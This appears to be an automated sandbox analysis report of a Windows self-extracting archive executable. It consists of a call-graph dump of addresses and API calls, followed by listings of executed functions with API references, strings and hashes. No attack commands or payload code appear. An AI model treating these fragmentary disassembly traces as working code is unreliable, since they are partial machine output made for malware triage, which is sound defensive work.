ba70dd 42 API calls 2 library calls 24508->24612 24524 b904a3 24509->24524 24510->24511 24511->24508 24517 b90133 24511->24517 24513 b903be 24513->24509 24514 b903c9 GetModuleFileNameW CreateFileW 24513->24514 24515 b90478 CloseHandle 24514->24515 24516 b903fc SetFilePointer 24514->24516 24515->24509 24516->24515 24518 b9040c ReadFile 24516->24518 24517->24508 24518->24515 24521 b9042b 24518->24521 24521->24515 24523 b90085 2 API calls 24521->24523 24522 b904d2 CompareStringW 24522->24524 24523->24521 24524->24522 24525 b90508 GetFileAttributesW 24524->24525 24526 b90520 24524->24526 24603 b8acf5 24524->24603 24606 b90085 24524->24606 24525->24524 24525->24526 24527 b9052a 24526->24527 24530 b90560 24526->24530 24529 b90542 GetFileAttributesW 24527->24529 24531 b9055a 24527->24531 24528 b9066f 24552 b99da4 GetCurrentDirectoryW 24528->24552 24529->24527 24529->24531 24530->24528 24532 b8acf5 GetVersionExW 24530->24532 24531->24530 24533 b9057a 24532->24533 24534 b90581 24533->24534 24535 b905e7 24533->24535 24537 b90085 2 API calls 24534->24537 24536 b8400a _swprintf 51 API calls 24535->24536 24538 b9060f AllocConsole 24536->24538 24539 b9058b 24537->24539 24540 b9061c GetCurrentProcessId AttachConsole 24538->24540 24541 b90667 ExitProcess 24538->24541 24542 b90085 2 API calls 24539->24542 24613 ba35b3 24540->24613 24544 b90595 24542->24544 24546 b8ddd1 53 API calls 24544->24546 24547 b905b0 24546->24547 24548 b8400a _swprintf 51 API calls 24547->24548 24549 b905c3 24548->24549 24550 b8ddd1 53 API calls 24549->24550 24551 b905d2 24550->24551 24551->24541 24552->24265 24554 b90085 2 API calls 24553->24554 24555 b9a349 OleInitialize 24554->24555 24556 b9a36c GdiplusStartup SHGetMalloc 24555->24556 24556->24267 24558 b913d7 IsDBCSLeadByte 24557->24558 24558->24558 24559 b913ef 24558->24559 24559->24269 24561 b9bc8e 24560->24561 24562 b9179d CharUpperW 24561->24562 24563 b9bda4 24561->24563 24615 b8ecad 80 API calls ___scrt_fastfail 24561->24615 24562->24561 24563->24278 24563->24279 24566 b9e360 24565->24566 24567 b9d294 SetEnvironmentVariableW 24566->24567 24569 b9d2b7 24567->24569 24568 b9d2df 24568->24272 24569->24568 24570 b9d2d3 SetEnvironmentVariableW 24569->24570 24570->24568 24572 b9ae0e 24571->24572 24573 b9ae15 24571->24573 24616 b99e1c FindResourceW 24572->24616 24575 b9ae1b GetObjectW 24573->24575 24576 b9ae2a 24573->24576 24575->24576 24577 b99d1a 4 API calls 24576->24577 24578 b9ae3d 24577->24578 24579 b9ae80 24578->24579 24580 b9ae5c 24578->24580 24582 b99e1c 13 API calls 24578->24582 24590 b8d31c 24579->24590 24632 b99d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24580->24632 24584 b9ae4d 24582->24584 24583 b9ae64 24633 b99d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24583->24633 24584->24580 24586 b9ae53 DeleteObject 24584->24586 24586->24580 24587 b9ae6d 24634 b99f5d 8 API calls ___scrt_fastfail 24587->24634 24589 b9ae74 DeleteObject 24589->24579 24643 b8d341 24590->24643 24592 b8d328 24683 b8da4e GetModuleHandleW FindResourceW 24592->24683 24595 b98835 24596 b9e24a new 8 API calls 24595->24596 24597 b98854 24596->24597 24597->24291 24599 b9a3cc GdiplusShutdown CoUninitialize 24598->24599 24599->24307 24601->24298 24602->24305 24604 b8ad09 GetVersionExW 24603->24604 24605 b8ad45 24603->24605 24604->24605 24605->24524 24607 b9e360 24606->24607 24608 b90092 GetSystemDirectoryW 24607->24608 24609 b900c8 24608->24609 24610 b900aa 24608->24610 24609->24524 24611 b900bb LoadLibraryW 24610->24611 24611->24609 24612->24513 24614 b9063d GetStdHandle WriteConsoleW Sleep FreeConsole 24613->24614 24614->24541 24615->24561 24617 b99e70 24616->24617 24618 b99e3e SizeofResource 24616->24618 24617->24573 24618->24617 24619 b99e52 LoadResource 24618->24619 24619->24617 24620 b99e63 LockResource 24619->24620 24620->24617 24621 b99e77 GlobalAlloc 24620->24621 24621->24617 24622 b99e92 GlobalLock 24621->24622 24623 b99f21 GlobalFree 24622->24623 24624 b99ea1 __vswprintf_c_l 24622->24624 24623->24617 24625 b99ea9 CreateStreamOnHGlobal 24624->24625 24626 b99f1a GlobalUnlock 24625->24626 24627 b99ec1 24625->24627 24626->24623 24635 b99d7b GdipAlloc 24627->24635 24630 b99f05 24630->24626 24631 b99eef GdipCreateHBITMAPFromBitmap 24631->24630 24632->24583 24633->24587 24634->24589 24636 b99d8d 24635->24636 24637 b99d9a 24635->24637 24639 b99b0f 24636->24639 24637->24626 24637->24630 24637->24631 24640 b99b30 GdipCreateBitmapFromStreamICM 24639->24640 24641 b99b37 GdipCreateBitmapFromStream 24639->24641 24642 b99b3c 24640->24642 24641->24642 24642->24637 24644 b8d34b _wcschr __EH_prolog 24643->24644 24645 b8d37a GetModuleFileNameW 24644->24645 24646 b8d3ab 24644->24646 24647 b8d394 24645->24647 24685 b899b0 24646->24685 24647->24646 24649 b8d407 24696 ba5a90 26 API calls 3 library calls 24649->24696 24650 b89653 79 API calls 24651 b8d7ab 24650->24651 24651->24592 24652 b93781 76 API calls 24654 b8d3db 24652->24654 24654->24649 24654->24652 24667 b8d627 24654->24667 24655 b8d41a 24697 ba5a90 26 API calls 3 library calls 24655->24697 24657 b8d563 24657->24667 24715 b89d30 77 API calls 24657->24715 24661 b8d57d new 24662 b89bf0 80 API calls 24661->24662 24661->24667 24665 b8d5a6 new 24662->24665 24664 b8d42c 24664->24657 24664->24667 24698 b89e40 24664->24698 24706 b89bf0 24664->24706 24714 b89d30 77 API calls 24664->24714 24665->24667 24680 b8d5b2 new 24665->24680 24716 b9137a MultiByteToWideChar 24665->24716 24667->24650 24668 b8d72b 24717 b8ce72 76 API calls 24668->24717 24670 b8da0a 24722 b8ce72 76 API calls 24670->24722 24672 b8d9fa 24672->24592 24673 b8d771 24718 ba5a90 26 API calls 3 library calls 24673->24718 24675 b8d742 24675->24673 24677 b93781 76 API calls 24675->24677 24676 b8d78b 24719 ba5a90 26 API calls 3 library calls 24676->24719 24677->24675 24679 b91596 WideCharToMultiByte 24679->24680 24680->24667 24680->24668 24680->24670 24680->24672 24680->24679 24720 b8dd6b 50 API calls __vsnprintf 24680->24720 24721 ba58d9 26 API calls 3 library calls 24680->24721 24684 b8d32f 24683->24684 24684->24595 24686 b899ba 24685->24686 24687 b89a39 CreateFileW 24686->24687 24688 b89a59 GetLastError 24687->24688 24690 b89aaa 24687->24690 24691 b8b66c 2 API calls 24688->24691 24689 b89ae1 24689->24654 24690->24689 24692 b89ac7 SetFileTime 24690->24692 24693 b89a79 24691->24693 24692->24689 24693->24690 24694 b89a7d CreateFileW GetLastError 24693->24694 24695 b89aa1 24694->24695 24695->24690 24696->24655 24697->24664 24699 b89e64 SetFilePointer 24698->24699 24700 b89e53 24698->24700 24701 b89e9d 24699->24701 24702 b89e82 GetLastError 24699->24702 24700->24701 24723 b86fa5 75 API calls 24700->24723 24701->24664 24702->24701 24704 b89e8c 24702->24704 24704->24701 24724 b86fa5 75 API calls 24704->24724 24708 b89bfc 24706->24708 24712 b89c03 24706->24712 24708->24664 24709 b89cc0 24709->24708 24713 b8984e 5 API calls 24709->24713 24710 b89c9e 24710->24708 24737 b86f6b 75 API calls 24710->24737 24712->24708 24712->24709 24712->24710 24725 b8984e 24712->24725 24713->24709 24714->24664 24715->24661 24716->24680 24717->24675 24718->24676 24719->24667 24720->24680 24721->24680 24722->24672 24723->24699 24724->24701 24726 b8985c GetStdHandle 24725->24726 24727 b89867 ReadFile 24725->24727 24726->24727 24728 b89880 24727->24728 24732 b898a0 24727->24732 24729 b89989 GetFileType 24728->24729 24730 b89887 24729->24730 24731 b898a8 GetLastError 24730->24731 24733 b898b7 24730->24733 24736 b89895 24730->24736 24731->24732 24731->24733 24732->24712 24733->24732 24735 b898c7 GetLastError 24733->24735 24734 b8984e GetFileType 24734->24732 24735->24732 24735->24736 24736->24734 24737->24708 24739 ba7430 _abort 24738->24739 24740 ba7448 24739->24740 24741 ba757e _abort GetModuleHandleW 24739->24741 24760 baa3f1 EnterCriticalSection 24740->24760 24743 ba743c 24741->24743 24743->24740 24772 ba75c2 GetModuleHandleExW 24743->24772 24747 ba750b 24764 ba753d 24747->24764 24748 ba7537 24781 bb1a19 5 API calls ___delayLoadHelper2@8 24748->24781 24749 ba7450 24756 ba74c5 24749->24756 24759 ba74ee 24749->24759 24780 ba7f30 20 API calls _abort 24749->24780 24753 ba81f1 _abort 5 API calls 24758 ba74dd 24753->24758 24754 ba81f1 _abort 5 API calls 24754->24759 24756->24753 24756->24758 24758->24754 24761 ba752e 24759->24761 24760->24749 24782 baa441 LeaveCriticalSection 24761->24782 24763 ba7507 24763->24747 24763->24748 24783 baa836 24764->24783 24767 ba756b 24770 ba75c2 _abort 8 API calls 24767->24770 24768 ba754b GetPEB 24768->24767 24769 ba755b GetCurrentProcess TerminateProcess 24768->24769 24769->24767 24771 ba7573 ExitProcess 24770->24771 24773 ba760f 24772->24773 24774 ba75ec GetProcAddress 24772->24774 24775 ba761e 24773->24775 24776 ba7615 FreeLibrary 24773->24776 24777 ba7601 24774->24777 24778 b9ec4a ___delayLoadHelper2@8 5 API calls 24775->24778 24776->24775 24777->24773 24779 ba7628 24778->24779 24779->24740 24780->24756 24782->24763 24784 baa85b 24783->24784 24785 baa851 24783->24785 24786 baa458 __dosmaperr 5 API calls 24784->24786 24787 b9ec4a ___delayLoadHelper2@8 5 API calls 24785->24787 24786->24785 24788 ba7547 24787->24788 24788->24767 24788->24768 24789 b810d5 24794 b85bd7 24789->24794 24795 b85be1 __EH_prolog 24794->24795 24796 b8b07d 82 API calls 24795->24796 24797 b85bed 24796->24797 24801 b85dcc GetCurrentProcess GetProcessAffinityMask 24797->24801 24836 b9eac0 27 API calls pre_c_initialization 24883 b997c0 10 API calls 24838 ba9ec0 21 API calls 24884 bab5c0 GetCommandLineA GetCommandLineW 24839 b9a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24885 baebc1 21 API calls __vsnwprintf_l 24840 b9a430 73 API calls 24890 b9be49 103 API calls 4 library calls 22982 b89f2f 22983 b89f3d 22982->22983 22984 b89f44 22982->22984 22985 b89f4a GetStdHandle 22984->22985 22989 b89f55 22984->22989 22985->22989 22986 b89fa9 WriteFile 22986->22989 22987 b89f7a 22988 b89f7c WriteFile 22987->22988 22987->22989 22988->22987 22988->22989 22989->22983 22989->22986 22989->22987 22989->22988 22991 b8a031 22989->22991 22993 b86e18 60 API calls 22989->22993 22994 b87061 75 API calls 22991->22994 22993->22989 22994->22983 24841 b81025 29 API calls pre_c_initialization 24894 baa918 27 API calls 3 library calls 24895 b9be49 108 API calls 4 library calls 22998 b9dc1f 22999 b9dbcd 22998->22999 23001 b9df59 22999->23001 23029 b9dc67 23001->23029 23003 b9df73 23004 b9dfd0 23003->23004 23007 b9dff4 23003->23007 23005 b9ded7 DloadReleaseSectionWriteAccess 11 API calls 23004->23005 23006 b9dfdb RaiseException 23005->23006 23008 b9e1c9 23006->23008 23009 b9e06c LoadLibraryExA 23007->23009 23011 b9e0cd 23007->23011 23018 b9e0df 23007->23018 23024 b9e19b 23007->23024 23010 b9ec4a ___delayLoadHelper2@8 5 API calls 23008->23010 23009->23011 23012 b9e07f GetLastError 23009->23012 23013 b9e1d8 23010->23013 23014 b9e0d8 FreeLibrary 23011->23014 23011->23018 23015 b9e0a8 23012->23015 23016 b9e092 23012->23016 23013->22999 23014->23018 23019 b9ded7 DloadReleaseSectionWriteAccess 11 API calls 23015->23019 23016->23011 23016->23015 23017 b9e13d GetProcAddress 23020 b9e14d GetLastError 23017->23020 23017->23024 23018->23017 23018->23024 23021 b9e0b3 RaiseException 23019->23021 23022 b9e160 23020->23022 23021->23008 23022->23024 23025 b9ded7 DloadReleaseSectionWriteAccess 11 API calls 23022->23025 23040 b9ded7 23024->23040 23026 b9e181 RaiseException 23025->23026 23027 b9dc67 ___delayLoadHelper2@8 11 API calls 23026->23027 23028 b9e198 23027->23028 23028->23024 23030 b9dc99 23029->23030 23031 b9dc73 23029->23031 23030->23003 23048 b9dd15 23031->23048 23034 b9dc94 23058 b9dc9a 23034->23058 23037 b9ec4a ___delayLoadHelper2@8 5 API calls 23038 b9df55 23037->23038 23038->23003 23039 b9df24 23039->23037 23041 b9dee9 23040->23041 23042 b9df0b 23040->23042 23043 b9dd15 DloadLock 8 API calls 23041->23043 23042->23008 23044 b9deee 23043->23044 23045 b9df06 23044->23045 23047 b9de67 DloadProtectSection 3 API calls 23044->23047 23067 b9df0f 8 API calls 2 library calls 23045->23067 23047->23045 23049 b9dc9a DloadUnlock 3 API calls 23048->23049 23050 b9dd2a 23049->23050 23051 b9ec4a ___delayLoadHelper2@8 5 API calls 23050->23051 23052 b9dc78 23051->23052 23052->23034 23053 b9de67 23052->23053 23054 b9de7c DloadObtainSection 23053->23054 23055 b9de82 23054->23055 23056 b9deb7 VirtualProtect 23054->23056 23066 b9dd72 VirtualQuery GetSystemInfo 23054->23066 23055->23034 23056->23055 23059 b9dcab 23058->23059 23060 b9dca7 23058->23060 23061 b9dcaf 23059->23061 23062 b9dcb3 GetModuleHandleW 23059->23062 23060->23039 23061->23039 23063 b9dcc9 GetProcAddress 23062->23063 23065 b9dcc5 23062->23065 23064 b9dcd9 GetProcAddress 23063->23064 23063->23065 23064->23065 23065->23039 23066->23056 23067->23042 24896 b86110 80 API calls 24897 bab710 GetProcessHeap 24842 b9ec0b 28 API calls 2 library calls 24899 b9db0b 19 API calls ___delayLoadHelper2@8 23077 b9c40e 23078 b9c4c7 23077->23078 23085 b9c42c _wcschr 23077->23085 23079 b9c4e5 23078->23079 23092 b9be49 _wcsrchr 23078->23092 23132 b9ce22 23078->23132 23082 b9ce22 18 API calls 23079->23082 23079->23092 23082->23092 23083 b9ca8d 23085->23078 23086 b917ac CompareStringW 23085->23086 23086->23085 23087 b9c11d SetWindowTextW 23087->23092 23092->23083 23092->23087 23093 b9bf0b SetFileAttributesW 23092->23093 23099 b9c2e7 GetDlgItem SetWindowTextW SendMessageW 23092->23099 23101 b9c327 SendMessageW 23092->23101 23106 b917ac CompareStringW 23092->23106 23107 b9aa36 23092->23107 23111 b99da4 GetCurrentDirectoryW 23092->23111 23116 b8a52a 7 API calls 23092->23116 23117 b8a4b3 FindClose 23092->23117 23118 b9ab9a 76 API calls new 23092->23118 23119 ba35de 23092->23119 23094 b9bfc5 GetFileAttributesW 23093->23094 23095 b9bf25 ___scrt_fastfail 23093->23095 23094->23092 23098 b9bfd7 DeleteFileW 23094->23098 23095->23092 23095->23094 23112 b8b4f7 52 API calls 2 library calls 23095->23112 23098->23092 23103 b9bfe8 23098->23103 23099->23092 23101->23092 23113 b8400a 23103->23113 23104 b9c01d MoveFileW 23104->23092 23105 b9c035 MoveFileExW 23104->23105 23105->23092 23106->23092 23108 b9aa40 23107->23108 23109 b9aaf3 ExpandEnvironmentStringsW 23108->23109 23110 b9ab16 23108->23110 23109->23110 23110->23092 23111->23092 23112->23095 23155 b83fdd 23113->23155 23116->23092 23117->23092 23118->23092 23120 ba8606 23119->23120 23121 ba861e 23120->23121 23122 ba8613 23120->23122 23124 ba8626 23121->23124 23130 ba862f __dosmaperr 23121->23130 23227 ba8518 23122->23227 23125 ba84de _free 20 API calls 23124->23125 23129 ba861b 23125->23129 23126 ba8659 HeapReAlloc 23126->23129 23126->23130 23127 ba8634 23234 ba895a 20 API calls __dosmaperr 23127->23234 23129->23092 23130->23126 23130->23127 23235 ba71ad 7 API calls 2 library calls 23130->23235 23133 b9ce2c ___scrt_fastfail 23132->23133 23134 b9cf1b 23133->23134 23140 b9d08a 23133->23140 23241 b917ac CompareStringW 23133->23241 23238 b8a180 23134->23238 23138 b9cf4f ShellExecuteExW 23138->23140 23144 b9cf62 23138->23144 23140->23079 23141 b9cf47 23141->23138 23142 b9cf9b 23243 b9d2e6 6 API calls 23142->23243 23143 b9cff1 CloseHandle 23145 b9cfff 23143->23145 23146 b9d00a 23143->23146 23144->23142 23144->23143 23148 b9cf91 ShowWindow 23144->23148 23244 b917ac CompareStringW 23145->23244 23146->23140 23151 b9d081 ShowWindow 23146->23151 23148->23142 23150 b9cfb3 23150->23143 23152 b9cfc6 GetExitCodeProcess 23150->23152 23151->23140 23152->23143 23153 b9cfd9 23152->23153 23153->23143 23156 b83ff4 ___scrt_initialize_default_local_stdio_options 23155->23156 23159 ba5759 23156->23159 23162 ba3837 23159->23162 23163 ba385f 23162->23163 23164 ba3877 23162->23164 23179 ba895a 20 API calls __dosmaperr 23163->23179 23164->23163 23166 ba387f 23164->23166 23181 ba3dd6 23166->23181 23167 ba3864 23180 ba8839 26 API calls ___std_exception_copy 23167->23180 23171 ba386f 23172 b9ec4a ___delayLoadHelper2@8 5 API calls 23171->23172 23174 b83ffe GetFileAttributesW 23172->23174 23174->23103 23174->23104 23175 ba3907 23190 ba4186 51 API calls 3 library calls 23175->23190 23178 ba3912 23191 ba3e59 20 API calls _free 23178->23191 23179->23167 23180->23171 23182 ba3df3 23181->23182 23183 ba388f 23181->23183 23182->23183 23192 ba8fa5 GetLastError 23182->23192 23189 ba3da1 20 API calls 2 library calls 23183->23189 23185 ba3e14 23213 ba90fa 38 API calls __fassign 23185->23213 23187 ba3e2d 23214 ba9127 38 API calls __fassign 23187->23214 23189->23175 23190->23178 23191->23171 23193 ba8fbb 23192->23193 23194 ba8fc7 23192->23194 23215 baa61b 11 API calls 2 library calls 23193->23215 23216 ba85a9 20 API calls 2 library calls 23194->23216 23197 ba8fc1 23197->23194 23199 ba9010 SetLastError 23197->23199 23198 ba8fd3 23204 ba8fdb 23198->23204 23223 baa671 11 API calls 2 library calls 23198->23223 23199->23185 23201 ba8ff0 23203 ba8ff7 23201->23203 23201->23204 23224 ba8e16 20 API calls __dosmaperr 23203->23224 23217 ba84de 23204->23217 23205 ba8fe1 23207 ba901c SetLastError 23205->23207 23225 ba8566 38 API calls _abort 23207->23225 23208 ba9002 23210 ba84de _free 20 API calls 23208->23210 23212 ba9009 23210->23212 23212->23199 23212->23207 23213->23187 23214->23183 23215->23197 23216->23198 23218 ba84e9 RtlFreeHeap 23217->23218 23222 ba8512 __dosmaperr 23217->23222 23219 ba84fe 23218->23219 23218->23222 23226 ba895a 20 API calls __dosmaperr 23219->23226 23221 ba8504 GetLastError 23221->23222 23222->23205 23223->23201 23224->23208 23226->23221 23228 ba8556 23227->23228 23232 ba8526 __dosmaperr 23227->23232 23237 ba895a 20 API calls __dosmaperr 23228->23237 23230 ba8541 RtlAllocateHeap 23231 ba8554 23230->23231 23230->23232 23231->23129 23232->23228 23232->23230 23236 ba71ad 7 API calls 2 library calls 23232->23236 23234->23129 23235->23130 23236->23232 23237->23231 23245 b8a194 23238->23245 23241->23134 23242 b8b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23242->23141 23243->23150 23244->23146 23253 b9e360 23245->23253 23248 b8a189 23248->23138 23248->23242 23249 b8a1b2 23255 b8b66c 23249->23255 23251 b8a1c6 23251->23248 23252 b8a1ca GetFileAttributesW 23251->23252 23252->23248 23254 b8a1a1 GetFileAttributesW 23253->23254 23254->23248 23254->23249 23256 b8b679 23255->23256 23264 b8b683 23256->23264 23265 b8b806 CharUpperW 23256->23265 23258 b8b692 23266 b8b832 CharUpperW 23258->23266 23260 b8b6a1 23261 b8b71c GetCurrentDirectoryW 23260->23261 23262 b8b6a5 23260->23262 23261->23264 23267 b8b806 CharUpperW 23262->23267 23264->23251 23265->23258 23266->23260 23267->23264 24843 b9ea00 46 API calls 6 library calls 24900 b81f05 126 API calls __EH_prolog 23282 b9d573 23283 b9d580 23282->23283 23290 b8ddd1 23283->23290 23286 b8400a _swprintf 51 API calls 23287 b9d5a6 SetDlgItemTextW 23286->23287 23293 b9ac74 PeekMessageW 23287->23293 23298 b8ddff 23290->23298 23294 b9acc8 23293->23294 23295 b9ac8f GetMessageW 23293->23295 23296 b9aca5 IsDialogMessageW 23295->23296 23297 b9acb4 TranslateMessage DispatchMessageW 23295->23297 23296->23294 23296->23297 23297->23294 23304 b8d28a 23298->23304 23301 b8ddfc 23301->23286 23302 b8de22 LoadStringW 23302->23301 23303 b8de39 LoadStringW 23302->23303 23303->23301 23309 b8d1c3 23304->23309 23306 b8d2a7 23307 b8d2bc 23306->23307 23317 b8d2c8 26 API calls 23306->23317 23307->23301 23307->23302 23310 b8d1de 23309->23310 23316 b8d1d7 _strncpy 23309->23316 23312 b8d202 23310->23312 23318 b91596 WideCharToMultiByte 23310->23318 23315 b8d233 23312->23315 23319 b8dd6b 50 API calls __vsnprintf 23312->23319 23320 ba58d9 26 API calls 3 library calls 23315->23320 23316->23306 23317->23307 23318->23312 23319->23315 23320->23316 24846 b81075 82 API calls pre_c_initialization 24847 b95c77 121 API calls __vswprintf_c_l 24851 b9fc60 51 API calls 2 library calls 24853 ba3460 RtlUnwind 24854 ba9c60 71 API calls _free 24855 ba9e60 31 API calls 2 library calls 24194 b89b59 24197 b89bd7 24194->24197 24198 b89b63 24194->24198 24195 b89bad SetFilePointer 24196 b89bcd GetLastError 24195->24196 24195->24197 24196->24197 24198->24195 24902 b99b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24857 ba8050 8 API calls ___vcrt_uninitialize 24904 b9d34e DialogBoxParamW 24905 b9be49 98 API calls 3 library calls 24858 b9ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24859 b98c40 GetClientRect 24860 ba3040 5 API calls 2 library calls 24861 bb0040 IsProcessorFeaturePresent

              Executed Functions

              Function 00B9D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 00B900CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00B900E4
                • Part of subcall function 00B900CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B900F6
                • Part of subcall function 00B900CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B90127
                • Part of subcall function 00B99DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B99DAC
                • Part of subcall function 00B9A335: OleInitialize.OLE32(00000000), ref: 00B9A34E
                • Part of subcall function 00B9A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9A385
                • Part of subcall function 00B9A335: SHGetMalloc.SHELL32(00BC8430), ref: 00B9A38F
                • Part of subcall function 00B913B3: GetCPInfo.KERNEL32(00000000,?), ref: 00B913C4
                • Part of subcall function 00B913B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00B913D8
              • GetCommandLineW.KERNEL32 ref: 00B9D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B9D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B9D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00B9D68E
                • Part of subcall function 00B9D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9D29D
                • Part of subcall function 00B9D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9D2D9
              • CloseHandle.KERNEL32(00000000), ref: 00B9D697
              • GetModuleFileNameW.KERNEL32(00000000,00BDDC90,00000800), ref: 00B9D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,00BDDC90), ref: 00B9D6BE
              • GetLocalTime.KERNEL32(?), ref: 00B9D6C9
              • _swprintf.LIBCMT ref: 00B9D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B9D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 00B9D721
              • LoadIconW.USER32(00000000,00000064), ref: 00B9D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00B9D789
              • Sleep.KERNEL32(?), ref: 00B9D7B7
              • DeleteObject.GDI32 ref: 00B9D7F0
              • DeleteObject.GDI32(?), ref: 00B9D800
              • CloseHandle.KERNEL32 ref: 00B9D843
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-433059772
              • Opcode ID: fd6ce0a7961805582f2a36be83f7f1c5d245a6ab07ccbca9fb61503ed7034783
              • Instruction ID: a50441ce42355af4d83db89390a7cc6052e00abcdcc1035c7c8ddd70e2f0cd1a
              • Opcode Fuzzy Hash: fd6ce0a7961805582f2a36be83f7f1c5d245a6ab07ccbca9fb61503ed7034783
              • Instruction Fuzzy Hash: 7961D371904341AFDB20BB65DC89F2A7BECEB48741F0005BAF549972A2EFB4D904C7A1
              Function 00B99E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 770 b99e1c-b99e38 FindResourceW 771 b99f2f-b99f32 770->771 772 b99e3e-b99e50 SizeofResource 770->772 773 b99e70-b99e72 772->773 774 b99e52-b99e61 LoadResource 772->774 776 b99f2e 773->776 774->773 775 b99e63-b99e6e LockResource 774->775 775->773 777 b99e77-b99e8c GlobalAlloc 775->777 776->771 778 b99f28-b99f2d 777->778 779 b99e92-b99e9b GlobalLock 777->779 778->776 780 b99f21-b99f22 GlobalFree 779->780 781 b99ea1-b99ebf call b9f4b0 CreateStreamOnHGlobal 779->781 780->778 784 b99f1a-b99f1b GlobalUnlock 781->784 785 b99ec1-b99ee3 call b99d7b 781->785 784->780 785->784 790 b99ee5-b99eed 785->790 791 b99f08-b99f16 790->791 792 b99eef-b99f03 GdipCreateHBITMAPFromBitmap 790->792 791->784 792->791 793 b99f05 792->793 793->791
              APIs
              • FindResourceW.KERNEL32(00B9AE4D,PNG,?,?,?,00B9AE4D,00000066), ref: 00B99E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E46
              • LoadResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E59
              • LockResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B9AE4D,00000066), ref: 00B99E82
              • GlobalLock.KERNEL32(00000000), ref: 00B99E93
              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B99EB7
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B99EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00B99F1B
              • GlobalFree.KERNEL32(00000000), ref: 00B99F22
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
              • String ID: PNG
              • API String ID: 3656887471-364855578
              • Opcode ID: b50f11409e9683350965ba1934ef46ef7ff8915273ac4b0d64b035c3328ef9d7
              • Instruction ID: 81c4c79f7e09c9ab99d617e7bf9bedc8c43115fcf4fd8fc25dda9741a7dad816
              • Opcode Fuzzy Hash: b50f11409e9683350965ba1934ef46ef7ff8915273ac4b0d64b035c3328ef9d7
              • Instruction Fuzzy Hash: 7B316F71604706ABDB109F29DC48E2BBBEDFF89B51B04466CF906E3260DF71EC008A61
              Function 00B8A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
